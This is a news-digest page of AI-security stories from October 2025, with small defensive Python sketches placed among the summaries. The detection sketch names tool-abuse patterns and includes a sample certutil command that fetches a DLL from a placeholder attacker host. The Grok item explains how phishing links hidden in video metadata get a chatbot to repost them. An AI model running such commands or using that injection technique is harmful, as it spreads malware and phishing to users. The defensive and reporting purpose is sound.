All news with #ai security tag
Tue, October 14, 2025
UK Firms Lose an Average of $3.9M to Unmanaged AI Risk
⚠️ EY polling of 100 UK firms finds that nearly all respondents (98%) experienced financial losses from AI-related risks over the past year, with an average loss of $3.9m per company. The most common issues were regulatory non-compliance, inaccurate or poor-quality training data and high energy usage affecting sustainability goals. The report highlights governance shortfalls — only 17% of C-suite leaders could identify appropriate controls — and warns about the risks posed by unregulated “citizen developer” AI activity. EY recommends adopting comprehensive responsible AI governance, targeted C-suite training and formal policies for agentic AI.
Tue, October 14, 2025
Stopping Living-off-the-Land Abuse of Trusted Tools
🔒 CrowdStrike highlights how attackers increasingly weaponize trusted software—RMM tools, built-in Windows utilities, and admin binaries—to evade detection and operate within networks. The Falcon platform layers behavioral IOAs, custom controls, and Exposure Management and now adds APEX, a machine-learning model that analyzes command-line syntax, parameters, process lineage, timing, and context to detect LOLbin abuse. APEX is generally available for Windows and aims to raise detection while reducing false positives.
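APEX itself is a proprietary ML model, but the kind of command-line and process-lineage features it reportedly consumes can be illustrated with a toy rule-based sketch. The rules, names, and thresholds below are illustrative assumptions, not CrowdStrike's implementation:

```python
# Toy heuristic for flagging living-off-the-land (LOLbin) abuse from
# command-line and parent-process features. A real detector (e.g. APEX)
# learns from far richer signals: timing, lineage depth, full context.

SUSPICIOUS_PATTERNS = [
    ("certutil", "-urlcache"),   # certutil abused as a downloader
    ("rundll32", "http"),        # rundll32 fetching remote code
    ("powershell", "-enc"),      # encoded PowerShell payloads
    ("mshta", "http"),           # mshta executing a remote HTA
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

def score_event(parent: str, image: str, cmdline: str) -> list[str]:
    """Return the reasons a process event looks suspicious (empty if none)."""
    reasons = []
    cl = cmdline.lower()
    for binary, marker in SUSPICIOUS_PATTERNS:
        if binary in image.lower() and marker in cl:
            reasons.append(f"{binary} invoked with '{marker}'")
    if parent.lower() in OFFICE_PARENTS and image.lower() in SHELLS:
        reasons.append(f"shell spawned by Office app {parent}")
    return reasons

if __name__ == "__main__":
    print(score_event("explorer.exe", "certutil.exe",
                      "certutil -urlcache -split -f http://evil.example/a.dll"))
```

The point of the sketch is the feature choice, not the rules: command-line flags plus process lineage already separate routine admin use of a trusted binary from attacker use of the same binary.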
Mon, October 13, 2025
Rewiring Democracy: New Book on AI's Political Impact
📘 My latest book, Rewiring Democracy: How AI Will Transform Our Politics, Government, and Citizenship, will be published in just over a week. Two sample chapters (12 and 34 of 43) are available to read now, and copies can be ordered widely; signed editions are offered from my site. I’m asking readers and colleagues to help the book make a splash by leaving reviews, creating social posts, making a TikTok video, or sharing it on community platforms such as Slashdot.
Mon, October 13, 2025
Building a Lasting Security Culture at Microsoft
🔐 Microsoft frames security culture as a company-wide movement driven by people and operationalized through the Secure Future Initiative (SFI). The company overhauled employee education—launching the Microsoft Security Academy, refreshing the Security Foundations series, and requiring three annual sessions (90 minutes total)—to address AI-enabled attacks, deepfakes, and identity threats. Leadership mandates, linked compensation, measurable training outcomes (99% completion; rising satisfaction and relevancy scores), new identity and AI guides, Deputy CISOs in engineering, and embedded DevSecOps are highlighted as evidence of measurable cultural change.
Mon, October 13, 2025
Spain Arrests Leader of GXC Team Phishing Operation
🚨 Spanish authorities have arrested a 25-year-old Brazilian national accused of leading the GXC Team, a Crime-as-a-Service operation that sold phishing kits, Android malware and AI-based tools to cybercriminals. The Guardia Civil detained the suspect known as "GoogleXcoder" after a year-long investigation and six coordinated raids across Spain. Investigators seized devices containing source code, client communications and cryptocurrency records, and identified six suspected accomplices. The probe, supported by Group-IB and Brazil's Federal Police, remains ongoing as authorities disable the group's online infrastructure.
Mon, October 13, 2025
Varonis Interceptor: Multimodal AI Email Defense Platform
🛡️ Varonis introduces Interceptor, an AI-native email security solution that combines multimodal AI—visual, linguistic, and behavioral models—to detect advanced phishing, BEC, and social engineering. It augments or replaces API-based filters with a phishing sandbox that pre-analyzes newly registered domains and URLs and a lightweight browser extension for multichannel protection. Integrated with the Varonis Data Security Platform, Interceptor aims to reduce false positives, accelerate detection of zero-hour threats, and stop breaches earlier in the attack chain.
Mon, October 13, 2025
Weekly Recap: WhatsApp Worm, Oracle 0-Day and Ransomware
⚡ This weekly recap covers high-impact incidents and emerging trends shaping enterprise risk. Significant exploitation of an Oracle E-Business Suite zero-day (CVE-2025-61882) and linked payloads reportedly affected dozens of organizations, while a GoAnywhere MFT flaw (CVE-2025-10035) enabled multi-stage intrusions by Storm-1175. Other highlights include a WhatsApp worm, npm-based phishing chains, an emerging ransomware cartel, AI abuse, and a prioritized list of critical CVEs.
Mon, October 13, 2025
AI Governance: Building a Responsible Foundation Today
🔒 AI governance is a business-critical priority that lets organizations harness AI benefits while managing regulatory, data, and reputational risk. Establishing cross-functional accountability and adopting recognized frameworks such as ISO/IEC 42001:2023, the NIST AI RMF, and the EU AI Act creates practical guardrails. Leaders must invest in AI literacy and human-in-the-loop oversight. Governance should be adaptive and continuously improved.
Mon, October 13, 2025
AI Ethical Risks, Governance Boards, and AGI Perspectives
🔍 Paul Dongha, NatWest's head of responsible AI and former data and AI ethics lead at Lloyds, highlights the ethical red flags CISOs and boards must monitor when deploying AI. He calls out threats to human agency, technical robustness, data privacy, transparency, bias and the need for clear accountability. Dongha recommends mandatory ethics boards with diverse senior representation and a chief responsible AI officer to oversee end-to-end risk management. He also urges integrating audit and regulatory engagement into governance.
Mon, October 13, 2025
AI and the Future of American Politics: 2026 Outlook
🔍 The essay examines how AI is reshaping U.S. politics heading into the 2026 midterms, with campaign professionals, organizers, and ordinary citizens adopting automated tools to write messaging, target voters, run deliberative platforms, and mobilize supporters. Campaign vendors from Quiller to BattlegroundAI are streamlining fundraising, ad creation, and research, while civic groups and unions experiment with AI for outreach and internal organizing. Absent meaningful regulation, these capabilities scale rapidly and raise risks ranging from decontextualized persuasion and registration interference to state surveillance and selective suppression of political speech.
Mon, October 13, 2025
AI-Aided Malvertising: Chatbot Prompt-Injection Scams
🔍 Cybercriminals have abused X's AI assistant Grok to amplify phishing links hidden in paid video posts, a tactic researchers have dubbed 'Grokking.' Attackers embed malicious URLs in video metadata and then prompt the bot to identify the video's source, causing it to repost the link from a trusted account. The technique bypasses ad platform link restrictions and can reach massive audiences, boosting SEO and domain reputation. Treat outputs from public AI tools as untrusted and verify links before clicking.
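The closing advice — treat links surfaced by public AI tools as untrusted — can be enforced mechanically by checking any AI-surfaced URL against an explicit allowlist before following it. A minimal sketch; the domains are illustrative placeholders:

```python
# Treat URLs from a public AI assistant as untrusted: only follow a link
# if its hostname exactly matches, or is a subdomain of, an allowlisted
# domain. String suffix matching on "." + domain rejects lookalikes such
# as "example.com.attacker.net".
from urllib.parse import urlparse

TRUSTED_DOMAINS = {"example.com", "docs.example.com"}  # illustrative

def is_trusted(url: str) -> bool:
    host = urlparse(url).hostname or ""
    return any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)

if __name__ == "__main__":
    print(is_trusted("https://docs.example.com/guide"))
    print(is_trusted("https://example.com.attacker.net/login"))
```

Hostname-based allowlisting is deliberately strict: it ignores the path and query entirely, since those are exactly the parts an attacker controls when smuggling a link through a trusted account.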
Fri, October 10, 2025
Security Risks of Vibe Coding and LLM Developer Assistants
🛡️ AI developer assistants accelerate coding but introduce significant security risks across generated code, configurations, and development tools. Studies show models now compile code far more often yet still produce many OWASP- and MITRE-class vulnerabilities, and real incidents (for example Tea, Enrichlead, and the Nx compromise) highlight practical consequences. Effective defenses include automated SAST, security-aware system prompts, human code review, strict agent access controls, and developer training.
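The automated-scanning defense can be wired directly into the workflow that accepts assistant-generated code. As a toy illustration only — a real pipeline would run a full SAST tool such as Semgrep or CodeQL, and the rules below are invented examples:

```python
# Toy pre-commit scan for a few vulnerability patterns that commonly
# appear in LLM-generated code. Illustrative regex rules only; real
# SAST tools do semantic analysis, not pattern matching.
import re

RULES = {
    "hardcoded secret": re.compile(
        r"(?i)(api_key|password|secret)\s*=\s*['\"][^'\"]+['\"]"),
    "eval on input": re.compile(r"\beval\s*\("),
    "shell=True": re.compile(r"shell\s*=\s*True"),
}

def scan(source: str) -> list[str]:
    """Return the names of all rules the source code triggers."""
    return [name for name, rx in RULES.items() if rx.search(source)]

if __name__ == "__main__":
    print(scan('password = "hunter2"\nsubprocess.run(cmd, shell=True)'))
```

Gating merges on an empty `scan()` result is the mechanical half of the defense; the human-review and system-prompt measures above cover what pattern rules cannot.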
Fri, October 10, 2025
Navigating Public Sector Cybersecurity: AI and Zero Trust
🔒 Written by the CSO of Google Public Sector, the post frames an urgency-driven approach to modern government security, emphasizing AI-powered threat detection, Zero Trust engineering, and a shared responsibility model. It highlights how Google Security Operations (FedRAMP High), fused threat intelligence from VirusTotal and Mandiant, and fast incident response strengthen mission continuity. The piece stresses that legacy defenses are insufficient against AI-enhanced adversaries and calls for proactive, intelligence-led modernization.
Fri, October 10, 2025
Google Launches AI Vulnerability Reward Program
🔒 Google has launched an AI Vulnerability Reward Program (AI VRP) offering base rewards up to $20,000 and up to $30,000 with multipliers for validated AI-product bugs. The program moves AI-related reports from the Abuse VRP into a dedicated stream to simplify submissions and unify reward assessment. In-scope products include Search, Gemini apps and Workspace, and qualifying issues cover data exfiltration, phishing enablement and model theft. Content-focused prompt injections and jailbreaks remain out of scope and should be reported via in-product tools.
Fri, October 10, 2025
Autonomous AI Hacking and the Future of Cybersecurity
⚠️ AI agents are now autonomously conducting cyberattacks, chaining reconnaissance, exploitation, persistence, and data theft at machine speed and scale. In 2025 public demonstrations—from XBOW’s mass submissions on HackerOne in June, to DARPA teams and Google’s Big Sleep in August—along with operational reports from Ukraine’s CERT and vendors, show these systems rapidly find and weaponize new flaws. Criminals have operationalized LLM-driven malware and ransomware, while tools like HexStrike‑AI, Deepseek, and Villager make automated attack chains broadly available. Defenders can also leverage AI to accelerate vulnerability research and operationalize VulnOps, continuous discovery/continuous repair, and self‑healing networks, but doing so raises serious questions about patch correctness, liability, compatibility, and vendor relationships.
Fri, October 10, 2025
The AI SOC Stack of 2026: What Separates Top Platforms
🤖 As organizations scale and threats increase in sophistication and velocity, SOCs are integrating AI to augment detection, investigation, and response. The market ranges from prompt-dependent copilots to autonomous, mesh agentic systems that coordinate specialized AI agents across triage, correlation, and remediation. Leading solutions prioritize contextual intelligence, non-disruptive integration, staged trust, and measurable ROI rather than promising hands-off autonomy.
Fri, October 10, 2025
it-sa Highlights: Vendor Security and Access Solutions
🔒 At it-sa, vendors unveiled a slate of security, privacy and access offerings aimed at strengthening enterprise controls. Salesforce expanded its AI Agentforce into the Security Center and Privacy Center to automate threat detection, incident remediation and compliance prioritization. Ivanti reengineered Connect Secure 25.x with a security‑by‑design architecture including SELinux, WAF, secure boot and disk encryption. Additional launches included Samsung Knox mobile credentials, KOBIL mPower and a Zurich/Deutsche Telekom offering combining cyber insurance with MDR.
Fri, October 10, 2025
Move Beyond the CIA Triad: A Layered Security Model
🔐 The article contends that the Cold War–era CIA triad (confidentiality, integrity, availability) is too narrow for modern threats driven by cloud, AI, and fragile supply chains. It proposes the 3C Model—Core, Complementary, Contextual—to elevate authenticity, accountability, and resilience as foundational pillars rather than afterthoughts. The framework aims to harmonize standards, reduce duplication, and help CISOs speak in terms of survival, trust, and business impact instead of only uptime and technical controls.
Fri, October 10, 2025
CrowdStrike Named Visionary in 2025 Gartner SIEM Placement
🔍 CrowdStrike Falcon Next‑Gen SIEM has been named a Visionary in the 2025 Gartner Magic Quadrant for Security Information and Event Management. The product is presented as an agentic SOC engine that combines AI-driven detections, real-time telemetry and a unified data foundation to accelerate detection and response. CrowdStrike cites metrics including 150x faster search, over 1PB/day ingestion and up to 80% cost savings, and highlights the acquisition of Onum to improve real-time pipelines and scale. New AI agents for workflow, data transformation, search analysis and correlation rule generation aim to simplify playbook creation, data prep and detection tuning.
Fri, October 10, 2025
Six Steps for Disaster Recovery and Business Continuity
🔒 Modernize disaster recovery and continuity with six practical steps for CISOs. Secure executive funding and form a cross-functional team, map risks and locate data across cloud, SaaS, OT, and edge devices, and conduct a Business Impact Analysis to define a Minimal Viable Business (MVB). Evolve backups to 3-2-1-1-0 with immutable or air-gapped copies, adopt BaaS/DRaaS and AI-driven tools for discovery and autonomous backups, and run realistic, gamified tests followed by post-mortems.
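The 3-2-1-1-0 rule above (3 copies, on 2 media types, 1 offsite, 1 immutable or air-gapped, 0 verification errors) lends itself to a mechanical check against a backup inventory. A minimal sketch, with an invented record shape for each copy:

```python
# Check a backup inventory against the 3-2-1-1-0 rule. The BackupCopy
# record shape is an illustrative assumption, not any vendor's schema.
from dataclasses import dataclass

@dataclass
class BackupCopy:
    media: str          # e.g. "disk", "tape", "object-storage"
    offsite: bool
    immutable: bool     # immutable or air-gapped
    verify_errors: int  # errors from the last restore test

def meets_3_2_1_1_0(copies: list[BackupCopy]) -> bool:
    return (
        len(copies) >= 3                               # 3 copies
        and len({c.media for c in copies}) >= 2        # 2 media types
        and any(c.offsite for c in copies)             # 1 offsite copy
        and any(c.immutable for c in copies)           # 1 immutable/air-gapped
        and all(c.verify_errors == 0 for c in copies)  # 0 verified errors
    )
```

Running such a check after every gamified recovery test turns the post-mortem step into a pass/fail gate rather than a judgment call.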